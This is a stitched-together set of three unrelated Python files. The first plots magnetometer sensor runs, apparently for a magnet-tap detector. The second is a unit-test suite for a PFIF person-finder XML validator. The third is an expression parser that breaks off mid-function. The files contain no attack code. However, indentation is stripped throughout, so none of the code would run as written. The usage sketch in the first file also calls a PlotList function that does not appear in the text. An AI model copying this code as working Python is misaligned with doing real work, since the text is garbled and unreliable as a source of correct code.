"""In separate figures, plot the data for each run"""
for runData in runDataList:
PlotData(runData, optPlotData=optPlotData)
pl.show() # shows all the plots from above
def PlotFeatures(runDataList):
"""Plot X,Y,Z and magnitude of snippet in separate plots"""
f, axarr = pl.subplots(2, 4, sharex=True)
for runData in runDataList:
SubPlotFeature(runData, axarr)
positives = [rd for rd in runDataList if len(rd['labels']) > 0]
negatives = [rd for rd in runDataList if len(rd['labels']) == 0]
xp, yp, zp, mp = magnetak_util.CreateTemplates(positives)
newT = range(0,450000000,1000000)
axarr[0, 0].plot(newT, [xp(t) for t in newT], color='red')
axarr[0, 1].plot(newT, [yp(t) for t in newT], color='red')
axarr[0, 2].plot(newT, [zp(t) for t in newT], color='red')
axarr[0, 3].plot(newT, [mp(t) for t in newT], color='red')
xp, yp, zp, mp = magnetak_util.CreateTemplates(negatives)
newT = range(0,450000000,1000000)
axarr[1, 0].plot(newT, [xp(t) for t in newT], color='red')
axarr[1, 1].plot(newT, [yp(t) for t in newT], color='red')
axarr[1, 2].plot(newT, [zp(t) for t in newT], color='red')
axarr[1, 3].plot(newT, [mp(t) for t in newT], color='red')
pl.show()
def SubPlotFeature(runData, axarr):
magData = np.array(runData['magnetometer'])
magData = magData - magData[0,:] # normalize based on the first row
# magData = magData - magData[-1,:] # normalize based on the last value
magDomain = magData[:,0] # first index is time, second is accuracy
X = magData[:,2]
Y = magData[:,3]
Z = magData[:,4]
mag = np.sqrt(X**2 + Y**2 + Z**2)
magDomain = magDomain - magDomain[0] # put in same timescale
X = magnetak_util.scale(X)
Y = magnetak_util.scale(Y)
Z = magnetak_util.scale(Z)
mag = magnetak_util.scale(mag)
row = 0 if len(runData['labels']) > 0 else 1
axarr[row, 0].plot(magDomain, X, alpha=0.2)
axarr[row, 1].plot(magDomain, Y, alpha=0.2)
axarr[row, 2].plot(magDomain, Z, alpha=0.2)
axarr[row, 3].plot(magDomain, mag, alpha=0.2)
if row == 0:
axarr[row, 0].set_ylabel('True Positive')
axarr[row, 0].set_title('X')
axarr[row, 1].set_title('Y')
axarr[row, 2].set_title('Z')
axarr[row, 3].set_title('Magnitude')
else:
axarr[row, 0].set_ylabel('True Negative')
axarr[row, 0].set_ylim(axarr[0, 0].get_ylim())
axarr[row, 1].set_ylim(axarr[0, 1].get_ylim())
axarr[row, 2].set_ylim(axarr[0, 2].get_ylim())
axarr[row, 3].set_ylim(axarr[0, 3].get_ylim())
def PlotSnip(runData):
"""Plot magnitude of snippet in the same plot,
red if positive, blue otherwise
"""
magData = np.array(runData['magnetometer'])
magData = magData - magData[0,:] # normalize data based on first row
magDomain = magData[:,0] # first index is time, second is accuracy
X = magData[:,2]
Y = magData[:,3]
Z = magData[:,4]
mag = np.sqrt(X**2 + Y**2 + Z**2)
  magDomain = magDomain - magDomain[0] # put in same timescale
color = 'blue' if len(runData['labels']) > 0 else 'red'
pl.plot(magDomain, mag, color=color, alpha=0.1)
def PlotSnips(runDataList):
pl.figure()
pl.title("Snips")
for s in runDataList:
PlotSnip(s)
pl.show()
def PlotInterpolatedSnips(runDataList):
fcns = []
for runData in runDataList:
if len(runData['labels']) == 0:
continue
magData = np.array(runData['magnetometer'])
magData = magData - magData[0,:] # normalize data based on first row
# magData = magData - magData[-1,:] # normalize data based on last row
magDomain = magData[:,0] # first index is time, second is accuracy
X = magData[:,2]
Y = magData[:,3]
Z = magData[:,4]
mag = np.sqrt(X**2 + Y**2 + Z**2)
magDomain = magDomain - magDomain[0] # put in same timescale
mag = magnetak_util.scale(mag)
fcns.append(scipy.interpolate.interp1d(magDomain, mag, kind='cubic'))
pl.plot(magDomain, mag, alpha=0.2)
numFcns = float(len(fcns))
BigF = lambda x: sum([f(x) for f in fcns]) / numFcns
newX = range(0,450000000,1000000)
newY = [BigF(x) for x in newX]
pl.plot(newX, newY, color='red')
def PlotFeatureHistograms(snipList, featurizer, featureIndex=0, samePlot=True):
"""Plots two histograms of features, one for positive examples and one for
negative examples. This is used to help engineer good features."""
positives = [rd for rd in snipList if len(rd['labels']) > 0]
negatives = [rd for rd in snipList if len(rd['labels']) == 0]
pos_features = np.array([featurizer.featurize(rd['magnetometer']) for rd in positives])
neg_features = np.array([featurizer.featurize(rd['magnetometer']) for rd in negatives])
if samePlot:
n, bins, patches = pl.hist(pos_features[:,featureIndex], color='red', alpha=0.4)
pl.hist(neg_features[:,featureIndex], color='blue', bins=bins, alpha=0.4)
pl.show()
else:
pl.figure()
pl.title("Positive examples feature distribution")
pl.hist(pos_features[:,featureIndex], color='red')
pl.figure()
pl.title("Negative examples feature distribution")
pl.hist(neg_features[:,featureIndex], color='blue')
pl.show()
def PlotThresholds(runData, T1=30, T2=130, segment_size=200):
  """Plot the minimum and maximum offset norms of two adjacent sliding windows
  (each segment_size milliseconds long) against the detection thresholds: the
  minimum of the earlier window must be lower than T1 and the maximum of the
  most recent window must be higher than T2."""
pl.figure()
pl.title(runData['systemInfo']['Build.MODEL'] + " " + runData['filename'] + " Thresholds")
data = np.array(runData['magnetometer'])
domain = data[:,0] # first index is time, second is accuracy
# domain = domain * 1e9
min_seg1 = []
max_seg2 = []
segment_time_ns = segment_size * 1e6
window_size = segment_time_ns * 2
newDomain = domain[domain > domain[0] + window_size]
newDomain = map(long, newDomain)
for sensorTime in newDomain:
segment1 = data[(domain > sensorTime - window_size) & (domain <= sensorTime - segment_time_ns)]
segment2 = data[(domain > sensorTime - segment_time_ns) & (domain <= sensorTime)]
# For each window, calculate the baseline.
# Get the baseline S0, the last value before we start the segmentation.
S0 = segment2[-1, 2:5]
offsets1 = segment1[:, 2:5] - S0
offsets2 = segment2[:, 2:5] - S0
norms1 = [np.linalg.norm(row) for row in offsets1]
norms2 = [np.linalg.norm(row) for row in offsets2]
min_seg1.append(min(norms1))
max_seg2.append(max(norms2))
# Plot the thresholds.
pl.plot(newDomain, min_seg1, color='red')
pl.plot(newDomain, max_seg2, color='blue')
pl.plot(newDomain, np.ones(len(newDomain)) * T1, color='#aadddd') # Minimum must be lower
pl.plot(newDomain, np.ones(len(newDomain)) * T2, color='#ddaadd') # Maximum must be higher
pl.show()
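# Minimal usage sketch (illustrative only): the runData dict layout below is
# inferred from the plotting functions above -- 'magnetometer' rows are
# [time_ns, accuracy, x, y, z] and 'labels' rows start with a timestamp.
if __name__ == '__main__':
  _t = np.arange(0, 1e9, 1e7)
  _mag = np.column_stack([_t, np.zeros_like(_t),
                          np.sin(_t / 1e8), np.cos(_t / 1e8), np.ones_like(_t)])
  _run = {'filename': 'synthetic_run',
          'systemInfo': {'Build.MODEL': 'FakePhone'},
          'magnetometer': _mag.tolist(),
          'labels': []}
  PlotList([_run], optPlotData=True)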
|
|
#!/usr/bin/env python
# coding=utf-8
# Copyright 2011 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for pfif_validator.py"""
import unittest
from StringIO import StringIO
import os
import sys
from pfif_validator import PfifValidator
import pfif_validator # to test main
import datetime
import utils
from utils import Message
import tests.pfif_xml as PfifXml
class ValidatorTests(unittest.TestCase):
"""Tests each validation function in pfif_validator.py"""
EXPIRED_TIME = datetime.datetime(1999, 3, 1)
PRINT_VALIDATOR_OUTPUT = True
# Set Up
def setUp(self): # pylint: disable=C0103
"""Some of the tests will run code that prints stuff out. This prevents it
from printing next to the clean dots from the unit tests."""
if not ValidatorTests.PRINT_VALIDATOR_OUTPUT:
sys.stdout = open(os.devnull, "w")
@staticmethod
def set_up_validator(xml):
"""Creates a PFIF validator from XML"""
pfif_file = StringIO(xml)
return PfifValidator(pfif_file)
# printing
def test_printing(self):
"""Tests that each of the printing options in set_printing_options changes
the behavior of print_errors"""
# set up the messages to be printed; the XML file here will not be used for
# any tests. It's just to get the validator initialized properly.
validator = self.set_up_validator(PfifXml.XML_11_SMALL)
lines = []
for i in range(1, 12):
lines.append('ZZZ ' + str(i))
messages = []
messages.append(Message("Message 1", is_error=True, xml_line_number=11,
xml_text="Text", person_record_id="Person",
note_record_id="Note"))
messages.append(Message("Message 2", is_error=False))
messages.append(Message("Message 3"))
# With no errors or warnings, nothing should print
output = validator.validator_messages_to_str(messages, show_errors=False,
show_warnings=False)
self.assertEqual(len(output), 0)
# with only errors on, only errors should print
output = validator.validator_messages_to_str(messages, show_warnings=False,
show_line_numbers=False,
show_record_ids=False,
show_xml_text=False,
show_full_line=False)
self.assertNotEqual(output.find("Message 1"), -1)
self.assertEqual(output.find("Message 2"), -1)
# the default value of is_error should be True, so Message 3 should print
self.assertNotEqual(output.find("Message 3"), -1)
# with warnings on, warnings should print
output = validator.validator_messages_to_str(
messages, show_line_numbers=False, show_record_ids=False,
show_xml_text=False, show_full_line=False)
self.assertNotEqual(output.find("Message 2"), -1)
# line numbers, xml text, and record IDs should not print with them off and
# should print with them on
self.assertEqual(output.find("11"), -1)
output = validator.validator_messages_to_str(
messages, show_line_numbers=True, show_record_ids=False,
show_xml_text=False, show_full_line=False)
self.assertNotEqual(output.find("11"), -1)
self.assertEqual(output.find("Text"), -1)
output = validator.validator_messages_to_str(
messages, show_record_ids=False, show_xml_text=True,
show_full_line=False)
self.assertNotEqual(output.find("Text"), -1)
self.assertEqual(output.find("Person"), -1)
self.assertEqual(output.find("Note"), -1)
output = validator.validator_messages_to_str(
messages, show_record_ids=True, show_full_line=False)
self.assertNotEqual(output.find("Person"), -1)
self.assertNotEqual(output.find("Note"), -1)
self.assertEqual(output.find("ZZZ 11"), -1)
output = validator.validator_messages_to_str(
messages, show_full_line=True, xml_lines=lines)
self.assertNotEqual(output.find("ZZZ 11"), -1)
# is_html should output a div somewhere
self.assertEqual(output.find("div"), -1)
output = validator.validator_messages_to_str(
messages, is_html=True, xml_lines=lines)
self.assertNotEqual(output.find("div"), -1)
# validate_root_has_child
def test_root_has_child(self):
"""validate_root_has_child should return an empty list if the root node has
at least one child"""
validator = self.set_up_validator(PfifXml.XML_11_SMALL)
self.assertEqual(len(validator.validate_root_has_child()), 0)
def test_root_lacks_child(self):
"""validate_root_has_child should return a list with a message if the root
node does not have at least one child"""
validator = self.set_up_validator(PfifXml.XML_ROOT_LACKS_CHILD)
self.assertNotEqual(len(validator.validate_root_has_child()), 0)
# validate_root_has_mandatory_children
def test_root_has_mandatory_children(self):
"""validate_root_has_mandatory_children should return an empty list if one
of the children is a person"""
validator = self.set_up_validator(PfifXml.XML_11_SMALL)
self.assertEqual(len(validator.validate_root_has_mandatory_children()), 0)
def test_root_lacks_mandatory_children(self):
"""validate_root_has_mandatory_children should return a list with a message
if the only children are not notes or persons"""
validator = self.set_up_validator(PfifXml.XML_ROOT_HAS_BAD_CHILD)
self.assertNotEqual(
len(validator.validate_root_has_mandatory_children()), 0)
def test_root_has_note_child_11(self):
"""validate_root_has_mandatory_children should return a list with a message
if the only children are notes and the version is 1.1"""
validator = self.set_up_validator(PfifXml.XML_TOP_LEVEL_NOTE_11)
self.assertNotEqual(
len(validator.validate_root_has_mandatory_children()), 0)
def test_root_has_note_child_12(self):
"""validate_root_has_mandatory_children should return an empty list if the
only children are notes and the version is greater than 1.1"""
validator = self.set_up_validator(PfifXml.XML_TOP_LEVEL_NOTE_12)
self.assertEqual(len(validator.validate_root_has_mandatory_children()), 0)
# validate_has_mandatory_children
def test_note_has_mandatory_children(self):
"""validate_has_mandatory_children should return an empty list if it is
given notes with all mandatory children"""
validator = self.set_up_validator(PfifXml.XML_NOTES_WITH_CHILDREN)
self.assertEqual(len(validator.validate_note_has_mandatory_children()), 0)
def test_note_has_no_mandatory_children(self):
"""validate_has_mandatory_children should return a list with nine missing
children when given one child of a person with no children and one top level
note (which also must have a person_record_id) with no children."""
validator = self.set_up_validator(PfifXml.XML_NOTES_NO_CHILDREN)
self.assertEqual(len(validator.validate_note_has_mandatory_children()), 9)
def test_person_has_mandatory_children_11(self):
"""validate_has_mandatory_children should return an empty list if it is
given a version 1.1 person with all mandatory children"""
validator = self.set_up_validator(PfifXml.XML_PERSON_WITH_CHILDREN_11)
self.assertEqual(len(validator.validate_person_has_mandatory_children()), 0)
def test_person_has_mandatory_children_13(self):
"""validate_has_mandatory_children should return an empty list if it is
given a version 1.3 person with all mandatory children"""
validator = self.set_up_validator(PfifXml.XML_PERSON_WITH_CHILDREN_13)
self.assertEqual(len(validator.validate_person_has_mandatory_children()), 0)
def test_person_has_no_mandatory_children_11(self):
"""validate_has_mandatory_children should return a list with three missing
children when given a version 1.1 person with no children"""
validator = self.set_up_validator(PfifXml.XML_11_SMALL)
self.assertEqual(len(validator.validate_person_has_mandatory_children()), 3)
def test_person_has_no_mandatory_children_13(self):
"""validate_has_mandatory_children should return a list with three missing
children when given a version 1.3 person with no children"""
validator = self.set_up_validator(PfifXml.XML_PERSON_NO_CHILDREN_13)
self.assertEqual(len(validator.validate_person_has_mandatory_children()), 3)
# validate_fields_have_correct_format
def test_no_fields_exist(self):
"""validate_fields_have_correct_format should return an empty list when
passed a tree with no subelements of person or note because no nodes are
improperly formatted."""
validator = self.set_up_validator(PfifXml.XML_PERSON_NO_CHILDREN_13)
self.assertEqual(len(validator.validate_fields_have_correct_format()), 0)
validator = self.set_up_validator(PfifXml.XML_NOTES_NO_CHILDREN)
self.assertEqual(len(validator.validate_fields_have_correct_format()), 0)
def test_all_11_fields_have_correct_format(self):
"""validate_fields_have_correct_format should return an empty list when
passed a tree with all 1.1 elements in the correct formats."""
validator = self.set_up_validator(PfifXml.XML_11_FULL)
self.assertEqual(len(validator.validate_fields_have_correct_format()), 0)
#TODO(samking): test that non-ascii characters should be rejected
def test_no_11_fields_have_correct_format(self):
"""validate_fields_have_correct_format should return a list with every
subnode of person and note when every such subnode is of an incorrect
format. This tests all fields in version 1.1 for which incorrect input is
possible."""
validator = self.set_up_validator(PfifXml.XML_INCORRECT_FORMAT_11)
self.assertEqual(len(validator.validate_fields_have_correct_format()), 23)
def test_all_12_fields_have_correct_format(self):
"""validate_fields_have_correct_format should return an empty list when
presented with a document where all fields have the correct format. This
tests all fields introduced or changed in 1.2; it does not test fields that
were unchanged from 1.1."""
validator = self.set_up_validator(PfifXml.XML_FULL_12)
self.assertEqual(len(validator.validate_fields_have_correct_format()), 0)
def test_no_12_fields_have_correct_format(self):
"""validate_fields_have_correct_format should return a list with every
element presented to it when all fields have an incorrect format. This
tests all fields introduced or changed in 1.2, except ones that are always
accepted; it does not test fields that were unchanged from 1.1."""
validator = self.set_up_validator(PfifXml.XML_INCORRECT_FORMAT_12)
self.assertEqual(len(validator.validate_fields_have_correct_format()), 12)
def test_all_13_fields_have_correct_format(self):
"""validate_fields_have_correct_format should return an empty list when
presented with a document where all fields have the correct format. This
tests all fields introduced or changed in 1.3; it does not test fields that
were unchanged from 1.1 and 1.2."""
validator = self.set_up_validator(PfifXml.XML_CORRECT_FORMAT_13)
self.assertEqual(len(validator.validate_fields_have_correct_format()), 0)
def test_no_13_fields_have_correct_format(self):
"""validate_fields_have_correct_format should return a list with every
element presented to it when all fields have an incorrect format. This
tests all fields introduced or changed in 1.3, except ones that are always
accepted; it does not test fields that were unchanged from 1.1 and 1.2."""
validator = self.set_up_validator(PfifXml.XML_INCORRECT_FORMAT_13)
self.assertEqual(len(validator.validate_fields_have_correct_format()), 1)
# validate_unique_id
def test_person_ids_are_unique(self):
"""validate_person_ids_are_unique should return an empty list when all
person ids are unique"""
validator = self.set_up_validator(PfifXml.XML_UNIQUE_PERSON_IDS)
self.assertEqual(len(validator.validate_person_ids_are_unique()), 0)
def test_note_ids_are_unique(self):
"""validate_note_ids_are_unique should return an empty list when all note
ids are unique"""
validator = self.set_up_validator(PfifXml.XML_UNIQUE_NOTE_IDS)
self.assertEqual(len(validator.validate_note_ids_are_unique()), 0)
def test_person_ids_are_not_unique(self):
"""validate_person_ids_are_unique should return a list with all non-unique
person ids when there are non-unique person ids"""
validator = self.set_up_validator(PfifXml.XML_DUPLICATE_PERSON_IDS)
self.assertEqual(len(validator.validate_person_ids_are_unique()), 2)
def test_note_ids_are_not_unique(self):
"""validate_person_ids_are_unique should return a list with all non-unique
note ids when there are non-unique note ids"""
validator = self.set_up_validator(PfifXml.XML_DUPLICATE_NOTE_IDS)
self.assertEqual(len(validator.validate_note_ids_are_unique()), 2)
# validate_notes_belong_to_persons
def test_notes_belong_to_people(self):
"""validate_notes_belong_to_persons should return an empty list if all top
level notes have a person_record_id and all notes inside persons have no
person_record_id or the same person_record_id as the person."""
validator = self.set_up_validator(PfifXml.XML_NOTES_BELONG_TO_PEOPLE)
self.assertEqual(len(validator.validate_notes_belong_to_persons()), 0)
def test_notes_do_not_belong_to_people(self):
"""validate_notes_belong_to_persons should return a list with all top level
notes without a person_record_id and person_record_ids for notes that are
under a person with a person_record_id that doesn't match the person"""
validator = self.set_up_validator(PfifXml.XML_NOTES_WITHOUT_PEOPLE)
self.assertEqual(len(validator.validate_notes_belong_to_persons()), 2)
# validate_field_order
def test_correct_field_order_11(self):
"""validate_person_field_order and validate_note_field_order should return
    empty lists if all elements in all persons and notes are in the correct
order"""
validator = self.set_up_validator(PfifXml.XML_11_FULL)
self.assertEqual(len(validator.validate_person_field_order()), 0)
self.assertEqual(len(validator.validate_note_field_order()), 0)
def test_omitting_fields_is_okay_11(self):
"""validate_person_field_order and validate_note_field_order should return
    empty lists if all elements in all persons and notes are in the correct
    order, even if some elements are omitted (i.e., 1,2,4 is in order even though
3 is omitted)"""
validator = self.set_up_validator(PfifXml.XML_MISSING_FIELDS_11)
self.assertEqual(len(validator.validate_person_field_order()), 0)
self.assertEqual(len(validator.validate_note_field_order()), 0)
def test_incorrect_field_order_11(self):
"""validate_person_field_order and validate_note_field_order should return
the first element in every person and note that are out of order"""
validator = self.set_up_validator(PfifXml.XML_INCORRECT_FIELD_ORDER_11)
self.assertEqual(len(validator.validate_person_field_order()), 3)
self.assertEqual(len(validator.validate_note_field_order()), 2)
def test_nonexistent_field(self):
"""validate_person_field_order and validate_note_field_order should ignore
any fields that are not in the spec"""
validator = self.set_up_validator(PfifXml.XML_EXTRANEOUS_FIELD_11)
self.assertEqual(len(validator.validate_person_field_order()), 0)
def test_correct_field_order_12(self):
"""validate_person_field_order and validate_note_field_order should return
    empty lists if person_record_id comes first and any notes come last in
persons and if note_record_id and person_record_id come first in notes."""
validator = self.set_up_validator(PfifXml.XML_CORRECT_FIELD_ORDER_12)
self.assertEqual(len(validator.validate_person_field_order()), 0)
self.assertEqual(len(validator.validate_note_field_order()), 0)
def test_incorrect_person_field_order_12(self):
"""validate_person_field_order should return a list with one entry for every
person that does not have notes at the end or that does not have its
person_record_id at the start"""
validator = self.set_up_validator(
PfifXml.XML_INCORRECT_PERSON_FIELD_ORDER_12)
self.assertEqual(len(validator.validate_person_field_order()), 3)
def test_incorrect_note_field_order_12(self):
"""validate_note_field_order should return a list with one entry for every
note that does not have note_record_id and person_record_id at the start"""
validator = self.set_up_validator(PfifXml.XML_INCORRECT_NOTE_FIELD_ORDER_12)
self.assertEqual(len(validator.validate_note_field_order()), 4)
def test_field_order_does_not_matter_13(self):
"""validate_person_field_order and validate_note_field_order should return
an empty list if the version is greater than 1.2 because order doesn't
matter"""
validator = self.set_up_validator(PfifXml.XML_ODD_ORDER_13)
self.assertEqual(len(validator.validate_person_field_order()), 0)
self.assertEqual(len(validator.validate_note_field_order()), 0)
# validate_expiry
def test_unexpired_records(self):
"""validate_expired_records_removed should return an empty list when no
records are expired"""
validator = self.set_up_validator(
PfifXml.XML_EXPIRE_99_HAS_DATA_NONSYNCED_DATES)
not_expired_1998 = datetime.datetime(1998, 11, 1, 1, 1, 1, 1)
utils.set_utcnow_for_test(not_expired_1998)
self.assertEqual(len(validator.validate_expired_records_removed()), 0)
just_not_expired = datetime.datetime(1999, 2, 4, 4, 5, 5, 0)
utils.set_utcnow_for_test(just_not_expired)
self.assertEqual(len(validator.validate_expired_records_removed()), 0)
def test_expired_records_with_empty_data(self):
"""validate_expired_records_removed should return an empty list when all
expired records have empty fields instead of real data"""
validator = self.set_up_validator(PfifXml.XML_EXPIRE_99_EMPTY_DATA)
utils.set_utcnow_for_test(ValidatorTests.EXPIRED_TIME)
self.assertEqual(len(validator.validate_expired_records_removed()), 0)
def test_expired_records_with_omissions(self):
"""validate_expired_records_removed should return an empty list when all
expired records omit fields instead of exposing real data"""
validator = self.set_up_validator(PfifXml.XML_EXPIRE_99_NO_DATA)
utils.set_utcnow_for_test(ValidatorTests.EXPIRED_TIME)
self.assertEqual(len(validator.validate_expired_records_removed()), 0)
def test_expired_records_with_unremoved_data(self):
"""validate_expired_records_removed should return a list with the
person_record_ids of all expired records that have data that should be
removed"""
validator = self.set_up_validator(
PfifXml.XML_EXPIRE_99_HAS_NOTE_SYNCED_DATES)
utils.set_utcnow_for_test(ValidatorTests.EXPIRED_TIME)
self.assertEqual(len(validator.validate_expired_records_removed()), 1)
just_expired = datetime.datetime(1999, 2, 4, 4, 5, 7)
utils.set_utcnow_for_test(just_expired)
self.assertEqual(len(validator.validate_expired_records_removed()), 1)
validator = self.set_up_validator(
PfifXml.XML_EXPIRE_99_HAS_DATA_SYNCED_DATES)
utils.set_utcnow_for_test(ValidatorTests.EXPIRED_TIME)
self.assertEqual(len(validator.validate_expired_records_removed()), 1)
def test_expired_records_with_unremoved_top_level_note(self):
"""validate_expired_records_removed should return a list with messages for
each expired record that still had a note referring to its
person_record_id"""
validator = (
self.set_up_validator(PfifXml.XML_EXPIRE_99_HAS_NOTE_DATA))
utils.set_utcnow_for_test(ValidatorTests.EXPIRED_TIME)
self.assertEqual(len(validator.validate_expired_records_removed()), 1)
def test_expiration_placeholder_with_bad_source_entry_date(self):
"""validate_expired_records_removed should return a list with the
person_record_ids of all expired records whose source_date and entry_date
are not the same value and are not created within a day after expiration"""
validator = self.set_up_validator(
PfifXml.XML_EXPIRE_99_NO_DATA_NONSYNCED_DATES)
utils.set_utcnow_for_test(ValidatorTests.EXPIRED_TIME)
self.assertEqual(len(validator.validate_expired_records_removed()), 2)
def test_no_expiration_before_13(self):
"""validate_expired_records_removed should return an empty list when the
version is before 1.3"""
validator = self.set_up_validator(PfifXml.XML_EXPIRE_99_12)
utils.set_utcnow_for_test(ValidatorTests.EXPIRED_TIME)
self.assertEqual(len(validator.validate_expired_records_removed()), 0)
def test_no_expiration_without_date(self):
"""validate_expired_records_removed should return an empty list when the
there isn't an expiry_date"""
validator = self.set_up_validator(PfifXml.XML_NO_EXPIRY_DATE)
utils.set_utcnow_for_test(ValidatorTests.EXPIRED_TIME)
self.assertEqual(len(validator.validate_expired_records_removed()), 0)
validator = self.set_up_validator(PfifXml.XML_EMPTY_EXPIRY_DATE)
utils.set_utcnow_for_test(ValidatorTests.EXPIRED_TIME)
self.assertEqual(len(validator.validate_expired_records_removed()), 0)
# validate_linked_person_records_are_matched
def test_unlinked_records(self):
"""validate_linked_records_matched should return an empty list when
evaluating unlinked persons"""
validator = self.set_up_validator(PfifXml.XML_UNLINKED_RECORDS)
self.assertEqual(len(validator.validate_linked_records_matched()), 0)
def test_correctly_linked_records(self):
"""validate_linked_records_matched should return an empty list when
evaluating two persons that each have notes with linked_person_record_ids
pointing at each other"""
validator = self.set_up_validator(PfifXml.XML_CORRECTLY_LINKED_RECORDS)
self.assertEqual(len(validator.validate_linked_records_matched()), 0)
def test_asymmetrically_linked_records(self):
"""validate_linked_records_matched should return a list with each
note_record_id that has a linked_person_record_id that is not matched"""
validator = self.set_up_validator(PfifXml.XML_ASYMMETRICALLY_LINKED_RECORDS)
self.assertEqual(len(validator.validate_linked_records_matched()), 1)
# validate_extraneous_fields
def test_no_extra_fields(self):
"""validate_extraneous_fields should return an empty list when presented
with a list that only includes fields in the PFIF spec"""
validator = self.set_up_validator(PfifXml.XML_11_FULL)
self.assertEqual(len(validator.validate_extraneous_fields()), 0)
def test_gibberish_fields(self):
"""validate_extraneous_fields should return a list with every field that is
not defined anywhere in the PFIF spec. This includes fields defined in PFIF
1.3 when using a 1.2 document."""
validator = self.set_up_validator(PfifXml.XML_GIBBERISH_FIELDS)
self.assertEqual(len(validator.validate_extraneous_fields()), 5)
def test_duplicate_fields(self):
"""validate_extraneous_fields should return a list with every duplicated
field (except for multiple <pfif:note> fields in one <pfif:person> or fields
that are not at the same place in the tree, such as a note and a person with
a person_record_id or two different notes)"""
validator = self.set_up_validator(PfifXml.XML_DUPLICATE_FIELDS)
self.assertEqual(len(validator.validate_extraneous_fields()), 3)
def test_top_level_note_11(self):
"""validate_extraneous_fields should return a list with every top level note
in a PFIF 1.1 document"""
validator = self.set_up_validator(PfifXml.XML_TOP_LEVEL_NOTE_PERSON_11)
self.assertEqual(len(validator.validate_extraneous_fields()), 2)
# main application + run_validations
def test_run_validations_without_errors(self):
"""run_validations should return an empty message list when passed a valid
file"""
validator = self.set_up_validator(PfifXml.XML_11_FULL)
self.assertEqual(len(validator.run_validations()), 0)
def test_run_validations_with_errors(self):
"""run_validations should return a message list with three errors when the
root doesn't have a mandatory child and there are two duplicate nodes."""
validator = self.set_up_validator(PfifXml.XML_TWO_DUPLICATE_NO_CHILD)
self.assertEqual(len(validator.run_validations()), 3)
def test_main_no_args(self):
"""main should give an assertion if it is given the wrong number of args."""
old_argv = sys.argv
sys.argv = ['pfif_validator.py']
self.assertRaises(Exception, pfif_validator.main)
sys.argv = old_argv
def test_main(self):
"""main should not raise an exception under normal circumstances."""
old_argv = sys.argv
old_stdout = sys.stdout
sys.argv = ['pfif_validator.py', 'mocked_file']
sys.stdout = StringIO('')
utils.set_file_for_test(StringIO(PfifXml.XML_11_FULL))
pfif_validator.main()
self.assertFalse('all_messages' in sys.stdout.getvalue())
sys.stdout = old_stdout
sys.argv = old_argv
# line numbers
def test_line_numbers(self):
"""After initialization, all elements in the tree should have line
numbers in the map."""
validator = self.set_up_validator(PfifXml.XML_FULL_12)
nodes = validator.tree.get_all_persons()
nodes.extend(validator.tree.get_all_notes())
for node in nodes:
self.assertTrue(node in validator.tree.line_numbers)
for child in node.getchildren():
self.assertTrue(child in validator.tree.line_numbers)
# unicode
def test_unicode_works(self):
"""none of the validations should fail when processing a field that includes
unicode text."""
validator = self.set_up_validator(PfifXml.XML_UNICODE_12)
messages = validator.run_validations()
validator.validator_messages_to_str(messages)
self.assertEqual(len(messages), 0)
if __name__ == '__main__':
unittest.main()
|
|
"""Parsing espresso files"""
from e_nodes import *
from e_error import ParseError
from e_input import Input
from e_operators import *
def parse_string_literal(input_handler, end_ch):
string = ""
while True:
if input_handler.eof():
raise ParseError(input_handler, "end of input_handler inside string literal")
ch = input_handler.read_ch()
if ch == end_ch:
break
if ch == '\r' or ch == '\n':
raise ParseError(input_handler, "newline in string literal")
string += ch
return StringExpr(string)
def parse_float(input_handler, literal):
"""Parse a float"""
while True:
next_ch = input_handler.peek_ch()
if next_ch.isdigit() or next_ch == 'e' or next_ch == '.':
literal += input_handler.read_ch()
else:
break
input_handler.expect('f')
return FloatExpr(literal)
def parse_num(input_handler):
"""Parse a number"""
literal = ""
while True:
ch = input_handler.read_ch()
if not ch.isdigit():
raise ParseError(input_handler, "expected digit")
literal += ch
if not input_handler.peek_ch().isdigit():
break
if input_handler.peek_ch() == '.' or input_handler.peek_ch() == 'e':
return parse_float(input_handler, literal)
if len(literal) > 64:
raise ParseError(input_handler, "int is too long")
return IntExpr(literal)
def parse_obj_literal(input_handler):
"""Parsing an object literal"""
field_names = []
val_exprs = []
while True:
if input_handler.match_ws('}'):
break
field = parse_ident_expr(input_handler)
input_handler.expect_ws(':')
expr = parse_expr(input_handler)
field_names.append(field)
val_exprs.append(expr)
if input_handler.match_ws('}'):
break
input_handler.expect_ws(',')
return ObjectExpr(field_names, val_exprs)
def parse_expr_list(input_handler, end_str):
"""Parsing a list of expression"""
exprs = []
while True:
if input_handler.match_ws(end_str):
break
expr = parse_expr(input_handler)
exprs.append(expr)
if input_handler.match_ws(end_str):
break
input_handler.expect_ws(',')
return exprs
def parse_ident_expr(input_handler):
"""Parse and identifier"""
ident = ""
first_ch = input_handler.peek_ch()
if first_ch != '_' and not first_ch.isalpha():
raise ParseError(input_handler, "invalid first character for identifier")
while True:
ch = input_handler.peek_ch()
if not ch.isalnum() and ch != '_':
break
ident += input_handler.read_ch()
if len(ident) == 0:
raise ParseError(input_handler, "invalid identifier")
return ident
def parse_fun_expr(input_handler):
"""Parsing a function expression"""
input_handler.expect_ws('(')
params = []
while True:
if input_handler.match_ws(')'):
break
param = parse_ident_expr(input_handler)
params.append(param)
if input_handler.match_ws(')'):
break
input_handler.expect_ws(',')
input_handler.expect_ws('{')
body = parse_block_stmt(input_handler, '}')
return FunExpr(None, body, params)
def parse_expr_prec(input_handler, min_prec):
"""
The first call has min precedence 0
Each call loops to grab everything of the current precedence or
greater and builds a left-sided subtree out of it, associating
operators to their left operand
If an operator has less than the current precedence, the loop
breaks, returning us to the previous loop level, this will attach
the atom to the previous operator (on the right)
    If an operator has the minimum precedence or greater, it will
associate the current atom to its left and then parse the rhs
"""
lhs_expr = parse_atom(input_handler)
while True:
input_handler.eat_ws()
op = match_op(input_handler, min_prec, False)
if op is None:
break
next_min_prec = op.prec
if op.assoc == 'l':
if op.close_str is not None:
next_min_prec = 0
else:
next_min_prec = op.prec + 1
if op == OP_CALL:
arg_exprs = parse_expr_list(input_handler, ')')
lhs_expr = CallExpr(lhs_expr, arg_exprs)
elif op.arity == 2:
rhs_expr = parse_expr_prec(input_handler, next_min_prec)
lhs_expr = BinOpExpr(op, lhs_expr, rhs_expr)
